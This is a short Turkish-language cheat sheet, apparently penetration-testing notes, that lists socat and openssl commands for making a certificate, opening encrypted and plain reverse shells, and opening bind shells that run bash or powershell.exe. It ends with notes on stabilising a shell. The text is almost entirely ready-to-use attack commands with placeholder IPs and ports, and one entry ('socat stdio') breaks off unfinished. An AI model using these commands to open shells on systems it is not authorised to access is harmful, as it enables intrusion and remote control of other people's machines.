Anahtarın Şifrelenmesi:

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem

Bağlantının Oluşturulması (Hedef):

socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Bağlantının Oluşturulması (Saldırgan):

socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Anahtar ile Şifrenin Çözülmesi:

openssl rsautl -decrypt -inkey <private-key> -in <encrypted-file> -out <decrypted-file>

Socat ve OpenSSL ile (key-cert) ile Bağlantı:

socat stdio \

Socat ile Reverse Shell:

socat TCP-L:<port> -
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Socat ile Bind Shell:

socat TCP-L:<PORT> EXEC:"bash -li"
socat TCP-L:<PORT> EXEC:powershell.exe,pipes

Ek Notlar:

  • pty, allocates a pseudoterminal on the target – part of the stabilisation process
  • stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
  • sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
  • setsid, creates the process in a new session
  • sane, stabilises the terminal, attempting to "normalise" it.